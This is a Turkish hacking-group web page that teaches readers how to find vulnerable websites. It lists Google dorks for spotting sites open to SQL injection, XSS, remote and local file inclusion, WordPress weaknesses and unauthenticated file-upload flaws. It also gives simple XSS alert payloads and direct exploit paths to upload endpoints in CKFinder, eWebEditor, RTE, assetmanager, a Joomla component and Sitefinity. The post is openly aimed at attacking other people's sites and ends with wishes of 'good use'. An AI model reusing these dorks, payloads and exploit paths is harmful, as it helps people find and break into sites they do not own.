www.turkhackteam.org
   
  byregard
  Her Hangi Açığı Olan Site yi Nasıl Bulurum !
 
Her Hangi Açığı Olan Site yi Nasıl Bulurum !  
Bu exploitleri ve dorkları vs neyse google da taratın manuel el üzerinden..
Bu işlem biraz zorlayabilir herkesi fakat "DORK" dediğimiz şeyle açıklı siteleri bulacağız. Dorkları google girerek manuel tarama yaparak açıkları bulabilirsiniz. Sonuna " yada '  koyunuz bazı açıklar orta ya çıkabilir.



Sql için Örnek Dorklarımızı Kullanabilirsiniz ! : scannerlerle taratabilirsiniz !  

accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
contact.php?cartId=
content.php?id=                             
Bunlar ve daha çoğu google da var isterseniz dorkları kendiniz geliştirebilirsiniz size fayda sı var kendiniz geliştirirseniz !  


XSS Açıklı Site Bulmak 
için Dork   : Bu dorkları geliştirebilirsiniz. Fayda sı var !  
scannerlerle bulabilirsiniz.
“><script>alert(“regard”)</script>
“><script>alert(“hacked”)</script>
“><script>alert(“hacker”)</script> 
Daha bir çok dork google da var isteyen bulabilir isteyen kendisi geliştirebilir. 


-RFI Açıkları nasıl bulunur :
  

RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
Örnek Dorklar;

inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..  
Dorkları geliştirebilirsiniz isterseniz google dan farklı dorklar alabilirsiniz ve manuel tarama yapabilirsiniz. !
  


LFI Açık Site Bulmak 
için Dork :  Scannerlerle taratıp da bulabilirsiniz dorkları ! 
index.phppagina=
index.phpsite=
main.phpx=
default.phpbody=
Dorkları geliştirip daha iyi olursunuz ama ben yine vereyim sizler için alın kullanın ! 

Wordpress Site Açıkları için Dork :  Scannerlerle taratabilirsiniz.
("category/sin-categoria")
("non-cllassé")
("uncategorized")
Bu dorkları geliştirebilirsiniz.Google yazarak başka dorklar da bulabilirsiniz.
 

Uploadlı Açıklı Siteler İçin Exploitler :
inurl:includes/ckfinder/ckfinder.html
inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum. 


RTE Upload Açıklı Siteler için Exploitler :
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
exloit: /rte/RTE_popup_file_atch.asp
Dorkları geliştirebilirsiniz scannerlarda yoktur öyle biliyorum. 


Editor Açıklı Siteler İçin Eploitler :
inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
EXPLOİT : /Editor/assetmanager/assetmanager.asp 
Dorkları geliştirebilirsiniz scannerlerda yoktur.


Joomla Upload Açıklı Siteler İçin Exploitler : 
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/
Dorkları geliştirebilirsiniz.

Sitefinity: Login upload açıgı 
inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Bu konumuz da bu kadardı kolay gelsin herkese iyi kullanımlar iyi günler ... 









  
 
 
  Bugün 1 ziyaretçi (1 klik) kişi burdaydı! TürkSıberMafıa  
 
Turk Siber Mafia ! :) Yeni Başladık daha Dur Hele ! Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol